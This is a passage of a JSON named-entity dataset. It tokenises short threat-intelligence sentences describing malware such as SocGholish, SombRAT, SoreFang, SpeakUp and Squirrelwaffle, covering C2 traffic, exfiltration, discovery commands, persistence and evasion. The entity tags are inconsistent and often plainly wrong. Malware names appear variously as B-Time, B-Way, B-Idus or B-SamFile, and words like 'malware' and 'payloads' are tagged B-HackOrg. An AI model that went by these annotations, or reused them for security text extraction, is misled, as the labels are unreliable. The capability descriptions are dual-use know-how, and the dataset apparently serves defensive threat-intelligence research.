"web", "services", "including", "Pastebin", "and", "top4top." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "B-HackOrg", "O", "O", "O", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "Snip3", "can", "query", "the", "WMI", "class", "`Win32_ComputerSystem`", "to", "gather", "information." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-Tool", "O", "B-Way", "O", "I-Features", "O" ] }, { "tokens": [ "SocGholish", "can", "profile", "compromised", "systems", "to", "identify", "domain", "trust", "relationships." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SocGholish", "has", "been", "distributed", "through", "compromised", "websites", "with", "malicious", "content", "often", "masquerading", "as", "browser", "updates." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "SocGholish", "JavaScript", "payload", "has", "been", "delivered", "within", "a", "compressed", "ZIP", "archive.", "SocGholish", "has", "also", "single", "or", "double", "Base-64", "encoded", "references", "to", "its", "second-stage", "server", "URLs." ], "ner_tags": [ "O", "B-Way", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SocGholish", "can", "exfiltrate", "data", "directly", "to", "its", "C2", "domain", "via", "HTTP." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "SocGholish", "can", "download", "additional", "malware", "to", "infected", "hosts." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "B-HackOrg", "O", "O", "O" ] }, { "tokens": [ "The", "SocGholish", "payload", "is", "executed", "as", "JavaScript." ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SocGholish", "can", "send", "output", "from", "`whoami`", "to", "a", "local", "temp", "file", "using", "the", "naming", "convention", "`rad<5-hex-chars>.tmp`." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "SocGholish", "has", "lured", "victims", "into", "interacting", "with", "malicious", "links", "on", "compromised", "websites", "for", "execution." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SocGholish", "has", "been", "named", "`AutoUpdater.js`", "to", "mimic", "legitimate", "update", "files." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SocGholish", "can", "list", "processes", "on", "targeted", "hosts." ], "ner_tags": [ "B-SamFile", "O", "I-Way", "I-Way", "O", "O", "O" ] }, { "tokens": [ "SocGholish", "can", "identify", "the", "victim's", "browser", "in", "order", "to", "serve", "the", "correct", "fake", "update", "page." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SocGholish", "has", "been", "spread", "via", "emails", "containing", "malicious", "links." ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "SocGholish", "has", "the", "ability", "to", "enumerate", "system", "information", "including", "the", "victim", "computer", "name." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SocGholish", "can", "use", "IP-based", "geolocation", "to", "limit", "infections", "to", "victims", "in", "North", "America,", "Europe,", "and", "a", "small", "number", "of", "Asian-Pacific", "nations." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "I-Area", "O", "B-Area", "O", "O", "O", "O", "O", "B-Area", "O" ] }, { "tokens": [ "SocGholish", "has", "the", "ability", "to", "enumerate", "the", "domain", "name", "of", "a", "victim,", "as", "well", "as", "if", "the", "host", "is", "a", "member", "of", "an", "Active", "Directory", "domain." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SocGholish", "can", "use", "`whoami`", "to", "obtain", "the", "username", "from", "a", "compromised", "host." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SocGholish", "has", "used", "Amazon", "Web", "Services", "to", "host", "second-stage", "servers." ], "ner_tags": [ "B-Idus", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "SocGholish", "has", "used", "WMI", "calls", "for", "script", "execution", "and", "system", "profiling." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Socksbot", "creates", "a", "suspended", "svchost", "process", "and", "injects", "its", "DLL", "into", "it." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "O", "O", "B-Way", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Socksbot", "can", "write", "and", "execute", "PowerShell", "scripts." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "I-Features", "B-HackOrg", "B-Features" ] }, { "tokens": [ "Socksbot", "can", "list", "all", "running", "processes." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O" ] }, { "tokens": [ "Socksbot", "can", "start", "SOCKS", "proxy", "threads." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Socksbot", "can", "take", "screenshots." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "B-HackOrg" ] }, { "tokens": [ "SodaMaster", "can", "use", "a", "hardcoded", "RSA", "key", "to", "encrypt", "some", "of", "its", "C2", "traffic." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SodaMaster", "has", "the", "ability", "to", "download", "additional", "payloads", "from", "C2", "to", "the", "targeted", "system." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SodaMaster", "can", "use", "<code>RegOpenKeyW</code>", "to", "access", "the", "Registry." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SodaMaster", "can", "use", "\"stackstrings\"", "for", "obfuscation." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "SodaMaster", "can", "search", "a", "list", "of", "running", "processes." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "B-Features", "O", "O", "O" ] }, { "tokens": [ "SodaMaster", "has", "the", "ability", "to", "query", "the", "Registry", "to", "detect", "a", "key", "specific", "to", "VMware." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SodaMaster", "can", "use", "RC4", "to", "encrypt", "C2", "communications." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SodaMaster", "can", "check", "for", "the", "presence", "of", "the", "Registry", "key", "<code>HKEY_CLASSES_ROOT\\\\Applications\\\\VMwareHostOpen.exe</code>", "before", "proceeding", "to", "its", "main", "functionality." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SodaMaster", "can", "enumerate", "the", "host", "name", "and", "OS", "version", "on", "a", "target", "system." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SodaMaster", "can", "identify", "the", "username", "on", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SodaMaster", "has", "the", "ability", "to", "put", "itself", "to", "\"sleep\"", "for", "a", "specified", "time." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SombRAT", "has", "encrypted", "collected", "data", "with", "AES-256", "using", "a", "hardcoded", "key." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "O" ] }, { "tokens": [ "SombRAT", "can", "SSL", "encrypt", "C2", "traffic." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "B-Features", "B-HackOrg", "B-Features" ] }, { "tokens": [ "SombRAT", "can", "communicate", "over", "DNS", "with", "the", "C2", "server." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SombRAT", "has", "collected", "data", "and", "files", "from", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SombRAT", "can", "run", "<code>upload</code>", "to", "decrypt", "and", "upload", "files", "from", "storage." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Features", "O", "B-Features", "O", "B-Features", "I-Features", "O", "O" ] }, { "tokens": [ "SombRAT", "can", "use", "a", "custom", "DGA", "to", "generate", "a", "subdomain", "for", "C2." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "I-Tool", "I-Tool", "O", "I-Features", "I-Features", "B-HackOrg", "O", "O" ] }, { "tokens": [ "SombRAT", "can", "execute", "<code>loadfromfile</code>,", "<code>loadfromstorage</code>,", "and", "<code>loadfrommem</code>", "to", "inject", "a", "DLL", "from", "disk,", "storage,", "or", "memory", "respectively." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SombRAT", "has", "uploaded", "collected", "data", "and", "files", "from", "a", "compromised", "host", "to", "its", "C2", "server." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SombRAT", "has", "the", "ability", "to", "run", "<code>cancel</code>", "or", "<code>closeanddeletestorage</code>", "to", "remove", "all", "files", "from", "storage", "and", "delete", "the", "storage", "temp", "file", "on", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SombRAT", "can", "execute", "<code>enum</code>", "to", "enumerate", "files", "in", "storage", "on", "a", "compromised", "system." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SombRAT", "has", "the", "ability", "to", "download", "and", "execute", "additional", "payloads." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "I-Features", "I-Features", "B-HackOrg" ] }, { "tokens": [ "SombRAT", "can", "store", "harvested", "data", "in", "a", "custom", "database", "under", "the", "%TEMP%", "directory." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SombRAT", "can", "use", "a", "legitimate", "process", "name", "to", "hide", "itself." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SombRAT", "has", "the", "ability", "to", "respawn", "itself", "using", "<code>ShellExecuteW</code>", "and", "<code>CreateProcessW</code>." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "B-Features", "B-SamFile", "O", "B-SamFile" ] }, { "tokens": [ "SombRAT", "has", "the", "ability", "to", "use", "TCP", "sockets", "to", "send", "data", "and", "ICMP", "to", "ping", "the", "C2", "server." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "I-Features", "I-Features", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SombRAT", "can", "encrypt", "strings", "with", "XOR-based", "routines", "and", "use", "a", "custom", "AES", "storage", "format", "for", "plugins,", "configuration,", "C2", "domains,", "and", "harvested", "data." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "I-Features", "O", "O", "O", "O", "B-Features", "O", "B-Tool", "B-HackOrg", "B-Features", "O", "O", "O", "B-Features", "O", "O", "O", "I-Features", "O" ] }, { "tokens": [ "SombRAT", "has", "the", "ability", "to", "modify", "its", "process", "memory", "to", "hide", "process", "command-line", "arguments." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SombRAT", "can", "use", "the", "<code>getprocesslist</code>", "command", "to", "enumerate", "processes", "on", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-SamFile", "O", "O", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SombRAT", "has", "the", "ability", "to", "use", "an", "embedded", "SOCKS", "proxy", "in", "C2", "communications." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "SombRAT", "has", "encrypted", "its", "C2", "communications", "with", "AES." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "SombRAT", "can", "execute", "<code>getinfo</code>", "to", "enumerate", "the", "computer", "name", "and", "OS", "version", "of", "a", "compromised", "system." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SombRAT", "can", "execute", "<code>getinfo</code>", "to", "identify", "the", "username", "on", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SombRAT", "can", "enumerate", "services", "on", "a", "victim", "machine." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "SombRAT", "can", "execute", "<code>getinfo</code>", "to", "discover", "the", "current", "time", "on", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SoreFang", "can", "decode", "and", "decrypt", "exfiltrated", "data", "sent", "to", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SoreFang", "can", "enumerate", "domain", "accounts", "via", "<code>net.exe", "user", "/domain</code>." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SoreFang", "can", "enumerate", "domain", "groups", "by", "executing", "<code>net.exe", "group", "/domain</code>." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SoreFang", "can", "gain", "access", "by", "exploiting", "a", "Sangfor", "SSL", "VPN", "vulnerability", "that", "allows", "for", "the", "placement", "and", "delivery", "of", "malicious", "update", "binaries." ], "ner_tags": [ "B-Idus", "O", "I-Purp", "I-Purp", "O", "O", "O", "B-Way", "I-Tool", "I-Tool", "B-Exp", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SoreFang", "has", "the", "ability", "to", "list", "directories." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "I-Features", "B-HackOrg" ] }, { "tokens": [ "SoreFang", "can", "download", "additional", "payloads", "from", "C2." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "B-HackOrg", "O", "O" ] }, { "tokens": [ "SoreFang", "can", "collect", "usernames", "from", "the", "local", "system", "via", "<code>net.exe", "user</code>." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "SoreFang", "has", "the", "ability", "to", "encode", "and", "RC6", "encrypt", "data", "sent", "to", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SoreFang", "can", "enumerate", "processes", "on", "a", "victim", "machine", "through", "use", "of", "Tasklist." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "SoreFang", "can", "gain", "persistence", "through", "use", "of", "scheduled", "tasks." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SoreFang", "can", "collect", "the", "hostname,", "operating", "system", "configuration,", "product", "ID,", "and", "disk", "space", "on", "victim", "machines", "by", "executing", "Systeminfo." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SoreFang", "can", "collect", "the", "TCP/IP,", "DNS,", "DHCP,", "and", "network", "adapter", "configuration", "on", "a", "compromised", "host", "via", "<code>ipconfig.exe", "/all</code>." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-Way", "B-Way", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "SoreFang", "can", "use", "HTTP", "in", "C2", "communications." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Spark", "has", "used", "a", "custom", "XOR", "algorithm", "to", "decrypt", "the", "payload." ], "ner_tags": [ "B-Way", "O", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O", "B-Features", "I-Features", "O" ] }, { "tokens": [ "Spark", "has", "exfiltrated", "data", "over", "the", "C2", "channel." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Spark", "has", "been", "packed", "with", "Enigma", "Protector", "to", "obfuscate", "its", "contents." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "Spark", "has", "encoded", "communications", "with", "the", "C2", "server", "with", "base64." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Spark", "can", "collect", "the", "hostname,", "keyboard", "layout,", "and", "language", "from", "the", "system." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Spark", "has", "checked", "the", "results", "of", "the", "<code>GetKeyboardLayoutList</code>", "and", "the", "language", "name", "returned", "by", "<code>GetLocaleInfoA</code>", "to", "make", "sure", "they", "contain", "the", "word", "“Arabic”", "before", "executing." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Spark", "has", "run", "the", "whoami", "command", "and", "has", "a", "built-in", "command", "to", "identify", "the", "user", "logged", "in." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Spark", "has", "used", "a", "splash", "screen", "to", "check", "whether", "an", "user", "actively", "clicks", "on", "the", "screen", "before", "running", "malicious", "code." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Spark", "has", "used", "HTTP", "POST", "requests", "to", "communicate", "with", "its", "C2", "server", "to", "receive", "commands." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Spark", "can", "use", "cmd.exe", "to", "run", "commands." ], "ner_tags": [ "B-Way", "O", "O", "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "SpeakUp", "uses", "Perl", "scripts." ], "ner_tags": [ "B-Idus", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "SpeakUp", "uses", "cron", "tasks", "to", "ensure", "persistence." ], "ner_tags": [ "B-Idus", "O", "B-Way", "B-Tool", "O", "O", "O" ] }, { "tokens": [ "SpeakUp", "encodes", "its", "second-stage", "payload", "with", "Base64." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "SpeakUp", "attempts", "to", "exploit", "the", "following", "vulnerabilities", "in", "order", "to", "execute", "its", "malicious", "script:", "CVE-2012-0874,", "CVE-2010-1871,", "CVE-2017-10271,", "CVE-2018-2894,", "CVE-2016-3088,", "JBoss", "AS", "3/4/5/6,", "and", "the", "Hadoop", "YARN", "ResourceManager." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "B-Features", "B-Features", "B-Features", "B-Features", "B-Way", "O", "O", "O", "O", "B-Idus", "B-SecTeam", "B-SecTeam" ] }, { "tokens": [ "SpeakUp", "deletes", "files", "to", "remove", "evidence", "on", "the", "machine." ], "ner_tags": [ "B-Way", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SpeakUp", "downloads", "and", "executes", "additional", "files", "from", "a", "remote", "server." ], "ner_tags": [ "B-Idus", "B-Features", "O", "B-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "SpeakUp", "checks", "for", "availability", "of", "specific", "ports", "on", "servers." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SpeakUp", "can", "perform", "brute", "forcing", "using", "a", "pre-defined", "list", "of", "usernames", "and", "passwords", "in", "an", "attempt", "to", "log", "in", "to", "administrative", "panels." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SpeakUp", "uses", "Python", "scripts." ], "ner_tags": [ "B-Idus", "O", "O", "O" ] }, { "tokens": [ "SpeakUp", "encodes", "C&C", "communication", "using", "Base64." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "SpeakUp", "uses", "the", "<code>cat", "/proc/cpuinfo", "|", "grep", "-c", "“cpu", "family”", "2>&1</code>", "command", "to", "gather", "system", "information." ], "ner_tags": [ "B-Idus", "O", "O", "B-SamFile", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SpeakUp", "uses", "the", "<code>ifconfig", "-a</code>", "command." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SpeakUp", "uses", "the", "<code>arp", "-a</code>", "command." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SpeakUp", "uses", "the", "<code>whoami</code>", "command." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O" ] }, { "tokens": [ "SpeakUp", "uses", "POST", "and", "GET", "requests", "over", "HTTP", "to", "communicate", "with", "its", "main", "C&C", "server." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SpicyOmelette", "has", "been", "signed", "with", "valid", "digital", "certificates." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SpicyOmelette", "has", "collected", "data", "and", "other", "information", "from", "a", "compromised", "host." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SpicyOmelette", "can", "download", "malicious", "files", "from", "threat", "actor", "controlled", "AWS", "URL's." ], "ner_tags": [ "B-Way", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SpicyOmelette", "has", "the", "ability", "to", "execute", "arbitrary", "JavaScript", "code", "on", "a", "compromised", "host." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SpicyOmelette", "has", "been", "executed", "through", "malicious", "links", "within", "spearphishing", "emails." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "SpicyOmelette", "can", "identify", "payment", "systems,", "payment", "gateways,", "and", "ATM", "systems", "in", "compromised", "environments." ], "ner_tags": [ "B-Way", "O", "B-Features", "I-Idus", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SpicyOmelette", "can", "check", "for", "the", "presence", "of", "29", "different", "antivirus", "tools." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SpicyOmelette", "can", "enumerate", "running", "software", "on", "a", "targeted", "system." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SpicyOmelette", "has", "been", "distributed", "via", "emails", "containing", "a", "malicious", "link", "that", "appears", "to", "be", "a", "PDF", "document." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Tool", "O" ] }, { "tokens": [ "SpicyOmelette", "can", "identify", "the", "system", "name", "of", "a", "compromised", "host." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SpicyOmelette", "can", "identify", "the", "IP", "of", "a", "compromised", "system." ], "ner_tags": [ "B-Way", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Squirrelwaffle", "has", "encrypted", "collected", "data", "using", "a", "XOR-based", "algorithm." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "Squirrelwaffle", "has", "decrypted", "files", "and", "payloads", "using", "a", "XOR-based", "algorithm." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "Squirrelwaffle", "has", "been", "obfuscated", "with", "a", "XOR-based", "algorithm." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Squirrelwaffle", "has", "exfiltrated", "victim", "data", "using", "HTTP", "POST", "requests", "to", "its", "C2", "servers." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Squirrelwaffle", "has", "downloaded", "and", "executed", "additional", "encoded", "payloads." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Squirrelwaffle", "has", "relied", "on", "users", "enabling", "malicious", "macros", "within", "Microsoft", "Excel", "and", "Word", "attachments." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "I-Way", "O", "O", "B-Tool", "B-Way" ] }, { "tokens": [ "Squirrelwaffle", "has", "relied", "on", "victims", "to", "click", "on", "a", "malicious", "link", "send", "via", "phishing", "campaigns." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Org", "B-OffAct" ] }, { "tokens": [ "Squirrelwaffle", "has", "used", "PowerShell", "to", "execute", "its", "payload." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Squirrelwaffle", "has", "been", "executed", "using", "`regsvr32.exe`." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "Squirrelwaffle", "has", "been", "executed", "using", "`rundll32.exe`." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "Squirrelwaffle", "has", "been", "packed", "with", "a", "custom", "packer", "to", "hide", "payloads." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "O", "O", "O" ] }, { "tokens": [ "Squirrelwaffle", "has", "been", "distributed", "via", "malicious", "Microsoft", "Office", "documents", "within", "spam", "emails." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "I-Way", "I-Way", "I-Way", "O", "B-Way", "O" ] }, { "tokens": [ "Squirrelwaffle", "has", "been", "distributed", "through", "phishing", "emails", "containing", "a", "malicious", "URL." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Way", "I-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Squirrelwaffle", "has", "encoded", "its", "communications", "to", "C2", "servers", "using", "Base64." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Squirrelwaffle", "has", "gathered", "victim", "computer", "information", "and", "configurations." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Squirrelwaffle", "has", "collected", "the", "victim’s", "external", "IP", "address." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Squirrelwaffle", "can", "collect", "the", "user", "name", "from", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Squirrelwaffle", "has", "contained", "a", "hardcoded", "list", "of", "IP", "addresses", "to", "block", "that", "belong", "to", "sandboxes", "and", "analysis", "platforms." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", 